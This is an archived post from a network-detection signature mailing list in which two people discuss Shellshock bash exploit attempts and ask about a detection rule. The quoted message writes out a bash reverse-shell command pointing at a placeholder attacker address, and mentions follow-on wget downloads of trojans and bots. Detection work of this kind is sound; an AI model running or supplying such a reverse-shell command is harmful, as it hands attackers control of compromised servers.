[Emerging-Sigs] Do you have a rule for this?

Will Metcalf wmetcalf at emergingthreatspro.com
Fri Sep 26 14:25:39 EDT 2014

Was thinking about this, and also  curl/wget/etc with args inbound to
web_servers. Have also seen direct wget's for ELF bins, Perl DDoS bots,
Perl Downloaders etc.



On Fri, Sep 26, 2014 at 1:19 PM, Livio Ricciulli <livio at metaflows.com>

> We have been seeing the bash exploit trying to execute:
> bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1
> This will give the bad_ip a shell to the attacker. They would typically
> execute a wget followed by Trojan install.
> I was wondering do you already have a rule that detects the above?
> if someone was executing that in anything would be bad I think..
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at lists.emergingthreats.net
> https://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> Support Emerging Threats! Subscribe to Emerging Threats Pro
> http://www.emergingthreats.net
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20140926/48931985/attachment.html>

More information about the Emerging-sigs mailing list